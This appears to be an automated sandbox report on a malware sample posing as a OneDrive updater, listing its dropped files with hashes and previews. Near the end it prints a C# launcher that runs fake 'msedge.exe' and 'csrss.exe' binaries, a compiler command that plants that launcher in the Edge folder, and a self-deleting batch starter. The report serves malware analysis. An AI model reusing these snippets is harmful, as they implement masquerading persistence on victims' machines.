Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4b0fm3yz.2mn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_as3lqtbw.3yu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bj43iu0h.ox4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d15kpfmg.imu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djuo542p.tce.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fglcdtmu.wm2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlzmu152.m5h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivz2e45l.u0w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktv4b33r.pxo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvipycrx.j1z.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvdqfttt.54r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwusko0v.50u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npjask2f.mql.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdan0wm2.mjh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvcn1mbb.4mt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdguoq4j.mre.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0sef5hz.qyt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbwt5tdx.okq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv4wjvkc.mnh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4l5jatw.udn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjjsdmoj.bto.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrcqimo0.jhi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\d5HCZ4WzK6

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:zh4NdPU:eg
MD5:	EA8E80CA0F11CEB978801BAB699B6666
SHA1:	C92493D2FAA8F11CC15A15CBBDDED49A28CFC3A3
SHA-256:	3F2758158D0304B2B98A82201B672E26A208B6FBDF255C890D11BE77CE03C727
SHA-512:	C05F355F458541818762043A80A756F3B4E873DE4946F14F87C655BFEF7C64BBDBDA28CC86E96053744319FA5470A0771AC69C88CF433090FD91267B1E23A349
Malicious:	false
Preview:	kH00Mh4A4cLjaaobYYqYbjNSR

C:\Users\user\AppData\Local\Temp\dxkojoo7pD

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:lDtdu2uEH:vdXH
MD5:	A42FF2DA3FB403B2A2D037AF40A9161E
SHA1:	5B2EB4C7888C5C29109D6983F90DAA9CBA5BC6E0
SHA-256:	E45C68F2BA7D3662820919A4A01132AF03A5A606AE556F3CAEDDA83F8444EBD1
SHA-512:	DA550A4D2B7C65BDFDD2524E9112AD04BB7D0C3D0EF1A0DCF8A1633BCE408D623ACC1AC06FB1E6D4AC5F6BD6BB3C5BBD4E5ACAD1DE03E4825D5A66AE2FCB7B4C
Malicious:	false
Preview:	DEl5hfbAaxKUrpKvyIU3NyFvn

C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.0.cs

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	400
Entropy (8bit):	4.913677742922444
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL2owsiFkD:JNVQIbSfhWLzIiFkMSfhKowJFkD
MD5:	1A7D77430239104223F44478C2C40E88
SHA1:	682643ABD077967A6091D06F86C8A3D80C6CA269
SHA-256:	850D5CEC4D9AEE0463027D8445EAFFE47F2F5E51C1FD7D7CDA1364748CF70075
SHA-512:	0424C4A2E6373330D47CD0546A240DEFFBC2A45EDD1E76EFBBED2C7A8685B12CE11BCEFF3008BED780B85DD75FEE6F00A092EEA17C4B137A0C1CF9D5D6EEE861
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\Documents\csrss.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.137354462950439
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fEFJpQJhn:Hu7L//TRRzscQlZUg
MD5:	8AB5EC7E5099F80092D735DB7D44B709
SHA1:	787ED6DC45DA16FFEEEC60A9D4A3C54E9FE17E0E
SHA-256:	71F10994FD36CE889B387BE1202132C912CF4D2378D91ECBCE5827D5D899393C
SHA-512:	1FED97DA490DF9F52BD0543CD20EF60B35D23CC89CDA4731C8C541CD78DF18DFA19983F4C4D270C049CF89C100136689DC8A9D1D15A7984C62161585C3547839
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.0.cs"

C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.out

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
Category:	modified
Size (bytes):	773
Entropy (8bit):	5.237869991586109
Encrypted:	false
SSDEEP:	24:KwI/un/VRzstDUVKax5DqBVKVrdFAMBJTH:xN/VRzEUVK2DcVKdBJj
MD5:	0AA11A4854BAEDD1C8C80E1CAB353F17
SHA1:	9CF445EC7974F50015DA7C0F070C1478C6B0746A
SHA-256:	4E4354C9C5B5F4B852CD7F2B4E02B46820DF0F23EC6E0A002553A68FF3F661E2
SHA-512:	FB4AD5F0F5BA2A10BA2086E594B85B651589D4FCBBDD935FF4331628ED5A5DF10D91A906B4B44FB81C73261CB0DC10277482244FC5A9127E5BE865DD65CEFD40
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	194
Entropy (8bit):	5.264084073706734
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DED+YbdoPSKOZG1cNwi23ffTh:CuVEOCDED+sdEZnF
MD5:	F9760DD7148B934FCA44637B42C32856
SHA1:	14AC84201CAE283C9D3F9CE49E309A07EC20AA2C
SHA-256:	E9629E6615ED4D60C2EF91A5DFEE9BA6DBC8367CE6C1766190186B251101C2E4
SHA-512:	AAB421A8FB9844D798F1C07E3B213D44D04432603F59920DB8018B5BD8CA00745279CE6767E664E26A006085D511EE80EE08A08A5C47E01AE139103260AAB6D0
Malicious:	false
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\hHF9v8Y4oh.bat"

C:\Users\user\AppData\Local\Temp\jTClDdUD7P

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:TDjJR0bb:v9R03
MD5:	09FBB9EA88742BC8F79DD4D502247D53
SHA1:	1858201BD1BD66AFA6B1F80203EF1F5F01CE6E4E
SHA-256:	DAE0E2F2C5E25C3E89E705154E4148C00DB527F1C284EE39D00332A249550B52
SHA-512:	E09D1ABC11B06F7D37BB3A658B2FE9D71F5A40D06910A649DDEADF54FDA61FF9CA5D45A55C154BB6F6AC4370DF93DC9737E65A9EB12FBE2DCB7210C312B8E526
Malicious:	false
Preview:	iwkINRwXWoQbtKwF92mdiWmnJ

C:\Users\user\AppData\Local\Temp\qg5Yz9DUoy

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:P4j/QNJd7yxNn:9T7un
MD5:	151C335721AC0E5FC4CBBF354CDE678F
SHA1:	F8CB0EC4BDF07E954391DE2E1A97E39B5660AF02
SHA-256:	B5D84CB53C7ED270315F7396C7BEAD2A20FF04FBA03AE20109E362EBEA2F58D1
SHA-512:	F72D5533EC6A1051381D2243ABE51D0C7D75B54FD2E4E5C2E2E7DBAFE58346BF6F82931EB5763780AC605F0E5408B19EDCD49717E20FB296E28BCE2FE3CE9235
Malicious:	false
Preview:	ikzuPjXfnCirpXtshlxayTWTh

C:\Users\user\AppData\Local\Temp\xv4IE5OV7A

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:3gOZvSMHr4zlJ:b1H2J
MD5:	E8A5A86A1C9A5C5E0A162A635BF561CB
SHA1:	D443AA69048D9C8F71A5CC1B797EA67D24442EFB
SHA-256:	04241796E74FC9E8D3121EEAF897091EE0D9C85CAF90EA5FF37BC80365E3F7FC
SHA-512:	29E36FF742E2E8CFC9E6E1029E6DAEA4C750261ADF21D489E91A8B7792FF5B5C801D242331E343FDCF97BDE171B77E629A482B4A0FFD2294993FCCC3D46CEDF3
Malicious:	false
Preview:	QkEkPvJwiVkA6BSyhX1VQABfp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	5.45838062222636
Encrypted:	false
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
MD5:	C1F1BEA182F1C3477C2F133C3AC26930
SHA1:	2145C09D2C3279AC83E844C4D80E7AA219E99B8D
